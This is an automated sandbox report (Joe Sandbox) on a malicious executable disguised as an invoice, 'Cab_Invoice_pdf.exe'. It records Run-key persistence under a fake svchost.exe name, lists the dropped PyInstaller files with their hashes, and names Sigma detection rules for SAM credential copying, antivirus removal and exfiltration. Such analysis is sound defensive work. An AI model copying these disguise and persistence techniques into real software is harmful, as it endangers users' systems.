Analysis ID: 534002
Start date: 04.12.2021
Start time: 23:20:31
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 14m 15s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Cab_Invoice_pdf.bin (renamed file extension from bin to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal72.evad.winEXE@19/204@7/4
EGA Information:
• Successful, ratio: 80%
HDC Information:
• Successful, ratio: 28.3% (good quality ratio 22.6%)
• Quality average: 58.9%
• Quality standard deviation: 39.1%
HCA Information:
• Successful, ratio: 64%
• Number of executed functions: 117
• Number of non-executed functions: 359
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 20.54.110.249, 52.251.79.25, 23.35.236.56
• Excluded domains from analysis (whitelisted): fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, tile-service.weather.microsoft.com, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Execution Graph export aborted for target svchost.exe, PID 6128 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
Errors:
• Sigma runtime error: Invalid condition: all of selection* Rule: Conti Backup Database
• Sigma runtime error: Invalid condition: all of selection* Rule: Stop Or Remove Antivirus Service
• Sigma runtime error: Invalid condition: all of selection* Rule: Conti Volume Shadow Listing
• Sigma runtime error: Invalid condition: all of selection* Rule: Compress Data and Lock With Password for Exfiltration With 7-ZIP
• Sigma runtime error: Invalid condition: all of selection* Rule: Disable or Delete Windows Eventlog
• Sigma runtime error: Invalid condition: all of selection* Rule: PowerShell SAM Copy
• Sigma runtime error: Invalid condition: all of selection* Rule: Compress Data and Lock With Password for Exfiltration With WINZIP

Simulations

Behavior and APIs

| Time | Type | Description |
|---|---|---|
| 23:22:05 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe |
| 23:22:13 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe |
| 23:22:15 | API Interceptor | 9x Sleep call for process: svchost.exe modified |

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

                          Created / dropped Files

                          C:\ProgramData\Microsoft\Network\Downloader\edb.log
                          Process:C:\Windows\System32\svchost.exe
                          File Type:MPEG-4 LOAS
                          Category:dropped
                          Size (bytes):1310720
                          Entropy (8bit):0.24860213207435874
                          Encrypted:false
                          SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU40:BJiRdwfu2SRU40
                          MD5:E7964A90D4F58CDF9FC8CD8F170E1392
                          SHA1:54B22245F232A23D7E4C3477612663F9D6AF0B9D
                          SHA-256:9C568A166DC1C5458C8D7009771B99302696371A335DA52DEF494099C7FBC162
                          SHA-512:FA48F415C8FEE1BD7FED538C5FF770484170A8DE5912EECEE01CBFDE46CE96ECD9586525510B99B312C7EA36B3A71AA75A2F271CA8711685FC2FCAB887A65AE3
                          Malicious:false
                          Reputation:unknown
                          Preview: V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                          Process:C:\Windows\System32\svchost.exe
                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0f1d7f0c, page size 16384, DirtyShutdown, Windows version 10.0
                          Category:dropped
                          Size (bytes):786432
                          Entropy (8bit):0.25069101930815285
                          Encrypted:false
                          SSDEEP:384:k+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:bSB2nSB2RSjlK/+mLesOj1J2
                          MD5:D8E0DFC4DCD06173CFC99DCC81026127
                          SHA1:8194240D2EB4D7B7991E9FD45208E0BCBAB75408
                          SHA-256:BA8B4868624CDDF07192E3EE65084F3B358D3A3A6A50FC6CEE4286E2A513898F
                          SHA-512:54702C8A0ED3E87925FD0E4423C6AE1BFA3A2B36ED28695A2952AD7F8871B1B9F0BDE820E85B6CFF6A99613313D788211B2323D5D15851BA6BBF072585DDAD0F
                          Malicious:false
                          Reputation:unknown
                          Preview: ....... ................e.f.3...w........................&..........w.......ym.h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w..............................................................................................................................................................................................................................................y.w.................6.@.....ym.........................................................................................................................................................................................................................................................................................................................................................................................
                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                          Process:C:\Windows\System32\svchost.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):16384
                          Entropy (8bit):0.07651195511846151
                          Encrypted:false
                          SSDEEP:3:9ELEvqmyiAl/bJdAtilsYoll3Vkttlmlnl:CyqDiAt473
                          MD5:451B32E663E5A366403C367ED08AA1ED
                          SHA1:1876CD992217A285F5CA329F8AB6564E763C732F
                          SHA-256:F44162197089E4A079F0E48B15F11D664B5455D6674BA4FF4F13DA5D496EF57C
                          SHA-512:1CA7880D20DB23D904077ADFF4844D4CB98A74C469284DCBE1BEC1549BED3ACBE51FB2CCF89DE32013B34BFAC8A6758FA9A8E65B70A8534FA12B6629224D4C45
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\4y2igpme
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):4
                          Entropy (8bit):2.0
                          Encrypted:false
                          SSDEEP:3:qn:qn
                          MD5:3F1D1D8D87177D3D8D897D7E421F84D6
                          SHA1:DD082D742A5CB751290F1DB2BD519C286AA86D95
                          SHA-256:F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
                          SHA-512:2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
                          Malicious:false
                          Reputation:unknown
                          Preview: blat
                          C:\Users\user\AppData\Local\Temp\_MEI24122\Include\pyconfig.h
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:C source, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):21096
                          Entropy (8bit):5.30196060437062
                          Encrypted:false
                          SSDEEP:384:rG3tApdkHRMYURIn1/8BsRV4ig8as8Ji2MgsdgTaXgDV:rG3tApWySE+aPfZXvV
                          MD5:31FEF4BD7506D25D27BF596F949A2066
                          SHA1:41F1D3A07B331220DAEA0B106D29D2A2DB74B45E
                          SHA-256:12347EF4F8CA786D33CAC569DDF61ACBDC506F986D1AA34F3BAAD8C062543DD3
                          SHA-512:062A1EF84DB04D91810CF81604A23E5226326E0BAD0B66077A22D05AC3EF6A06B36EFEBC0552FE2C0FAA17221275E95E77D11B952A29B6D3C3DB144622336B77
                          Malicious:false
                          Reputation:unknown
                          Preview: #ifndef Py_CONFIG_H..#define Py_CONFIG_H..../* pyconfig.h. NOT Generated automatically by configure.....This is a manually maintained version used for the Watcom,..Borland and Microsoft Visual C++ compilers. It is a..standard part of the Python distribution.....WINDOWS DEFINES:..The code specific to Windows should be wrapped around one of..the following #defines....MS_WIN64 - Code specific to the MS Win64 API..MS_WIN32 - Code specific to the MS Win32 (and Win64) API (obsolete, this covers all supported APIs)..MS_WINDOWS - Code specific to Windows, but all versions...Py_ENABLE_SHARED - Code if the Python core is built as a DLL.....Also note that neither "_M_IX86" or "_MSC_VER" should be used for..any purpose other than "Windows Intel x86 specific" and "Microsoft..compiler specific". Therefore, these should be very rare.......NOTE: The following symbols are deprecated:..NT, USE_DL_EXPORT, USE_DL_IMPORT, DL_EXPORT, DL_IMPORT..MS_CORE_DLL.....WIN32 is still required for the locale modul
                          C:\Users\user\AppData\Local\Temp\_MEI24122\VCRUNTIME140.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):76168
                          Entropy (8bit):6.781149490150774
                          Encrypted:false
                          SSDEEP:1536:zgTqURG2vo0RwvI7sjBH+cOKXc36r23oEecbi0mju:zdURhvZ6vIQVrPypecbi0m
                          MD5:87DD91C56BE82866BF96EF1666F30A99
                          SHA1:3B78CB150110166DED8EA51FBDE8EA506F72AEAF
                          SHA-256:49B0FD1751342C253CAC588DDA82EC08E4EF43CEBC5A9D80DEB7928109B90C4F
                          SHA-512:58C3EC6761624D14C7C897D8D0842DBEAB200D445B4339905DAC8A3635D174CDFB7B237D338D2829BC6C602C47503120AF5BE0C7DE6ABF2E71C81726285E44D6
                          Malicious:false
                          Antivirus:
                          • Antivirus: Metadefender, Detection: 0%, Browse
                          • Antivirus: ReversingLabs, Detection: 0%
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\_asyncio.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):57520
                          Entropy (8bit):6.4179566473980465
                          Encrypted:false
                          SSDEEP:1536:0iULU9Lbx5udbmDoOTXPnbhyBDmuo2iwBIuYncjNayr:0i4MLLbhamuo2iwBIuYncj3
                          MD5:54414D216C4DEA54799DC0F5CE657FBE
                          SHA1:0043CFCAE73985C7739ABDF6DBB0E4291EFDB5D2
                          SHA-256:CEF9A3D83E7CC45D99D666A6F8E7E58CC68ACB14E8858FE5BC6ED54A0F7C3898
                          SHA-512:F3CB7C8D38E59EB8F9A1CF693AD032FD560B4CCCB604B11C1BAE837FE045591C969A7E1EDF35F1BA9546EEF0E3C5D0D70188393B3C656B91ED95736AFC8A5358
                          Malicious:false
                          Antivirus:
                          • Antivirus: Metadefender, Detection: 0%, Browse
                          • Antivirus: ReversingLabs, Detection: 0%
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\_bz2.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):79536
                          Entropy (8bit):6.643809455301382
                          Encrypted:false
                          SSDEEP:1536:02MfT59id2pNXdCQXa64t3oS8bOWUwXpIuMVwqJyb:0T/5pNXdFa6llbOWUwXpIuMVwq0
                          MD5:445CE6BCEFB6EDDF0D953DBA17E0B320
                          SHA1:3D5FB5EEC6ECA27D37CAAE31F173DFD53909C74C
                          SHA-256:CF721704D96F071DE10A1E174A07BB1211864EA588CE1C4D6023F11701AAAB13
                          SHA-512:31B2247CB06C1905AE6857CC6FC23A9FC5E1C4FB7E76229D7444B417353A3EC76412DE73FF08750C09F5D1AD8644B8C07D79B3820E594AFE997DC733F610AA41
                          Malicious:false
                          Antivirus:
                          • Antivirus: Metadefender, Detection: 0%, Browse
                          • Antivirus: ReversingLabs, Detection: 0%
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\_ctypes.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):117424
                          Entropy (8bit):6.568932798472365
                          Encrypted:false
                          SSDEEP:1536:UhnXb10JQfHRFDrz2EH7EHURqBcNVValsffwv3TuLlbuRB/FfZWxOSQKkx1IuBPO:UhnLAI5xVVals3Py/FZWobKU1IuBPxEP
                          MD5:286CE553108A74197DF006D71D31918F
                          SHA1:01A9FDE2833F2FC684A442169480ECFC8F1559D0
                          SHA-256:13A45B718DF8CB4C0218F720C396973F8A501678C6CB6EF9380730C97553EE8C
                          SHA-512:3CA8AB25B4B069C702E02226623C0CEA55CDB7EC3FEEA50C81A0A2350BDCB9B5BB2C2D7768C810743024EA99568F20DF51ACC4AF28DAACDE0AF18F0F5D6B7A1F
                          Malicious:false
                          Antivirus:
                          • Antivirus: Metadefender, Detection: 0%, Browse
                          • Antivirus: ReversingLabs, Detection: 0%
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\_decimal.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):228528
                          Entropy (8bit):6.825703510403188
                          Encrypted:false
                          SSDEEP:6144:vISxoQN8s3Hs6B+ruCQxuqaxV3XMW5gVrserORH0i:vISxoS8s3HSruCQ6userOhv
                          MD5:DD8724365CDF7372892B0220BC8007C0
                          SHA1:0C43CFABCD2FD710432C7E76CF58CFEDE05F9069
                          SHA-256:FF753B671FE3A1D09B4676A0E08F85A4B19D0F5DD06B50DCA31339911730F343
                          SHA-512:42AF80495E1FA96A438ECE00D896D02BF3249BC4832CB182511384DB438A41F07A54A6F3F03FD992F32901A4D684E66EF337BA379CB0C9245A621CD04DB26B0D
                          Malicious:false
                          Antivirus:
                          • Antivirus: Metadefender, Detection: 0%, Browse
                          • Antivirus: ReversingLabs, Detection: 0%
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\_hashlib.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):39088
                          Entropy (8bit):6.576705962671287
                          Encrypted:false
                          SSDEEP:768:cAtCkdtp99Be3oOQi2ApPXl/mr/2IBIuYIBpLDG4y2jha:cAckdtp9/2oOQi3pfVm/2IBIuYIZyt
                          MD5:76A7E9C182FB34121881B868829786E5
                          SHA1:40392A3BAD97AA8C7C7C7ADD34A59F170E917747
                          SHA-256:D6F37E0BC993D76BFD3D8F28963E0936D893C3EA1B6A4B2ABCB06A053FF0BB94
                          SHA-512:4CE0AD1149F6A2619DFA17DDFC46AE3ECBE18A2A111A3457DF99B84B6F8768FCDB6470C3B0F93C08D43B06218C56EC19C7D21A6D4AEEB86F98A51DBCBCBBEC7D
                          Malicious:false
                          Antivirus:
                          • Antivirus: Metadefender, Detection: 0%, Browse
                          • Antivirus: ReversingLabs, Detection: 0%
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\_lzma.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):159408
                          Entropy (8bit):6.960223316470766
                          Encrypted:false
                          SSDEEP:3072:wV3Rr96Jf12nMU7gc22JNO2cUDQoxXChHALHuki4zHfBg9mNoaCmERoTpIuD1qyO:+hkFPMrxyhHALHEOpgYObdRoT0R
                          MD5:45D91843D03A51354A43D8DCECDF22E1
                          SHA1:C982DCDCEE7B2D64AEAA478D8FFE0087B64E391D
                          SHA-256:DB9ABC004E8DA4511025E47A255727CB45111195C6AEB6D50B61A037D7408D0A
                          SHA-512:34A13E0445499F7B655C40D9431710FDCCF1BFDA1C7477F23481E7C42526284736714ED38949F91098131F80B635631E3A0BA73DD3734D4E0759EE7F32968364
                          Malicious:false
                          Antivirus:
                          • Antivirus: Metadefender, Detection: 0%, Browse
                          • Antivirus: ReversingLabs, Detection: 0%
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\_multiprocessing.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):26800
                          Entropy (8bit):6.4189500308991985
                          Encrypted:false
                          SSDEEP:384:p6hMLUifrlrCojAelk6WPw6DsuOZRIuABLipJXj0DG4y8V5OB8hU:7lr9WY298RIuAtin0DG4ymFhU
                          MD5:DBEC7953A3000BB513B26A26F6C1128D
                          SHA1:B4CBF27FAB8DF534BE31D021E4C49C42161D4CBF
                          SHA-256:307046C4F970F910968EDDC6CB9B65767FA3A70C05AA966DD6434021FEEEBDDC
                          SHA-512:2C4D84F5D27E2EB84C1867223C147AB7B5F3C0B72671A5FBCC5936B3449D683AEBD7D3D2F07B4F4203E5D6523F0BD3F8314773567D5FB6FD7262A3CEBC84D20F
                          Malicious:false
                          Antivirus:
                          • Antivirus: Metadefender, Detection: 0%, Browse
                          • Antivirus: ReversingLabs, Detection: 0%
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\_overlapped.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):40112
                          Entropy (8bit):6.515613246434881
                          Encrypted:false
                          SSDEEP:768:iW1TpulXdyBdthIw5o8IYkITWb7PkNIuttgHDG4y5Eh8i:EXdyBdRTTWb7PkNIuttghydi
                          MD5:4E5C64134B6C40E187B7F8627A6D8A2D
                          SHA1:F5C6AFFAB5A1D14D8B586A1893E136D87DDAAD75
                          SHA-256:5EEF3EB8F87D332128569E4810F9283FF57417F1BB67D59D1AB2F471505DC1B1
                          SHA-512:7D6783D20AEC060BB1D5C72FADC8D52EF6812EE0776851C96FA2AD21B66C9FA853F5F43B8B775C8A741BD2B35938E2FCCAC16A829E37F7C425978C59BA62B60B
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\_queue.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):26288
                          Entropy (8bit):6.44734679501627
                          Encrypted:false
                          SSDEEP:768:XH9qUbFuF16rtrazup1IumUYllDG4yzFhj:3AUbFYktrazup1IumUYlvyH
                          MD5:963DD36AEC3EDB74C533B91C5A37498E
                          SHA1:5B553F18630F25C52A41BED0AC9C6262CCA662DA
                          SHA-256:D0E208BF308030C4BF879BA2A17FBEED48E10DD76C0DBDC9EB3D5F7A990302F6
                          SHA-512:513438B82C62BF26079BFD42CF6C562F7DF02A3190B246D9FB32B4342766C27EB77DEF8DE8D748B71C483CEC2B88DD9EDAE367ABFE8C157D135A259A8D859D48
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\_socket.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):69808
                          Entropy (8bit):6.611317372453449
                          Encrypted:false
                          SSDEEP:1536:+NU6t0wKLlEIOiKISMD9f8+LeJzJbHjW/Z1IuBwC8lYHy/:+NPt0wKLlfkMD9f8ueJdbHi/Z1IuBwpL
                          MD5:FB09559F0C1C4DC91DFBE361828B0E39
                          SHA1:E38A5B68F38E6FFF3C276CEA2B40620B33295879
                          SHA-256:5EC25AD36306076275E094FCE70E150C632B193C916847535DF3904545F879F0
                          SHA-512:6D9BAE50E82F0B57240EFA2E637DE01C16CF1AEAAF95DD9F4B3DDF391CE163D140C06549243EF8D370D76A866190A49A1C1D8E8C0177CE8A709C574A1220E86C
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\_ssl.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):143024
                          Entropy (8bit):6.46611957726107
                          Encrypted:false
                          SSDEEP:3072:Z8wJl2IslifCkaWuNPTTT/TpvdSRyOvm5GgDdhpIuM7GHux3P:Zpl2IsMDuTT/T/SRMGgDrqx
                          MD5:50F9B63B7632255FE69ABE0C2B4FAE04
                          SHA1:623BB9731CC5AA99EEB7C28DDF949495B0501717
                          SHA-256:0A7786AD8A9D4A24BD84B520BB7A8862DF949ABFCF10027172AAF0E3A18EDE7A
                          SHA-512:B35536AD316D7FABF7617451F9A4AC2088A473A97E8E023BB7AB55C50707ED9E7B3CAC2C72CE98A5F6D2CC56DF2A5D5A6B149110994006F76937BC22644D9273
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\_win32sysloader.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):11776
                          Entropy (8bit):5.256625843110757
                          Encrypted:false
                          SSDEEP:192:U48hFSvy3GI5DBb7qqAcUkOJk4fgF6O/G9RdfzaYy/o:sq8zb7DAcUkOJF3O/8I/
                          MD5:D9026D178C4220AA2C40CA592E31F5C6
                          SHA1:1EDD3463DA5AB5B442FCFBFB4E9A70940B7A5A76
                          SHA-256:D5E2378B9028810872ADE3AD7591B716466EAE621CA5B6FFFB4822949A9ABF9A
                          SHA-512:00251232772E5BAAF314DE7E8263229094D4057763620A3C929623E3C93CD30C8FA5243015434318CA9A4DFA8F2E82F9519AB6CF55F232D97296F0B5F93D376B
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-console-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.080160932980843
                          Encrypted:false
                          SSDEEP:192:3jBMWIghWGZiKedXe123Ouo+Uggs/nGfe4pBjS/uBmWh0txKdmVWQ4GWDZoiyqnP:GWPhWVXYi00GftpBjSemTltcwpS
                          MD5:502263C56F931DF8440D7FD2FA7B7C00
                          SHA1:523A3D7C3F4491E67FC710575D8E23314DB2C1A2
                          SHA-256:94A5DF1227818EDBFD0D5091C6A48F86B4117C38550343F780C604EEE1CD6231
                          SHA-512:633EFAB26CDED9C3A5E144B81CBBD3B6ADF265134C37D88CFD5F49BB18C345B2FC3A08BA4BBC917B6F64013E275239026829BA08962E94115E94204A47B80221
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-datetime-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.093995452106596
                          Encrypted:false
                          SSDEEP:192:RWIghWG4U9xluZo123Ouo+Uggs/nGfe4pBjSbMDPxVWh0txKdmVWQ4CWrDry6qnZ:RWPhWFv0i00GftpBjBHem6plUG+zIw
                          MD5:CB978304B79EF53962408C611DFB20F5
                          SHA1:ECA42F7754FB0017E86D50D507674981F80BC0B9
                          SHA-256:90FAE0E7C3644A6754833C42B0AC39B6F23859F9A7CF4B6C8624820F59B9DAD3
                          SHA-512:369798CD3F37FBAE311B6299DA67D19707D8F770CF46A8D12D5A6C1F25F85FC959AC5B5926BC68112FA9EB62B402E8B495B9E44F44F8949D7D648EA7C572CF8C
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-debug-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.1028816880814265
                          Encrypted:false
                          SSDEEP:384:cWPhWM4Ri00GftpBj2YILemtclD16PaEC:l10oiBQe/L
                          MD5:88FF191FD8648099592ED28EE6C442A5
                          SHA1:6A4F818B53606A5602C609EC343974C2103BC9CC
                          SHA-256:C310CC91464C9431AB0902A561AF947FA5C973925FF70482D3DE017ED3F73B7D
                          SHA-512:942AE86550D4A4886DAC909898621DAB18512C20F3D694A8AD444220AEAD76FA88C481DF39F93C7074DBBC31C3B4DAF97099CFED86C2A0AAA4B63190A4B307FD
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-errorhandling-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.126358371711227
                          Encrypted:false
                          SSDEEP:192:NFmxD3PWIghWGJY/luZo123Ouo+Uggs/nGfe4pBjSffcp8Wh0txKdmVWQ4yWRzOr:NFkWPhW60i00GftpBj4emHlD16Pa7v
                          MD5:6D778E83F74A4C7FE4C077DC279F6867
                          SHA1:F5D9CF848F79A57F690DA9841C209B4837C2E6C3
                          SHA-256:A97DCCA76CDB12E985DFF71040815F28508C655AB2B073512E386DD63F4DA325
                          SHA-512:02EF01583A265532D3970B7D520728AA9B68F2B7C309EE66BD2B38BAF473EF662C9D7A223ACF2DA722587429DA6E4FBC0496253BA5C41E214BEA240CE824E8A2
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-file-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):21816
                          Entropy (8bit):7.014255619395433
                          Encrypted:false
                          SSDEEP:384:d6PvVXHWPhWnsnhi00GftpBjaJemyDlD16PamW8:UPvVX85nhoisJeLt8
                          MD5:94AE25C7A5497CA0BE6882A00644CA64
                          SHA1:F7AC28BBC47E46485025A51EEB6C304B70CEE215
                          SHA-256:7EA06B7050F9EA2BCC12AF34374BDF1173646D4E5EBF66AD690B37F4DF5F3D4E
                          SHA-512:83E570B79111706742D0684FC16207AE87A78FA7FFEF58B40AA50A6B9A2C2F77FE023AF732EF577FB7CD2666E33FFAF0E427F41CA04075D83E0F6A52A177C2B0
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-file-l1-2-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.112057846012794
                          Encrypted:false
                          SSDEEP:192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
                          MD5:E2F648AE40D234A3892E1455B4DBBE05
                          SHA1:D9D750E828B629CFB7B402A3442947545D8D781B
                          SHA-256:C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
                          SHA-512:18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-file-l2-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.166618249693435
                          Encrypted:false
                          SSDEEP:192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
                          MD5:E479444BDD4AE4577FD32314A68F5D28
                          SHA1:77EDF9509A252E886D4DA388BF9C9294D95498EB
                          SHA-256:C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
                          SHA-512:2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-handle-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.1117101479630005
                          Encrypted:false
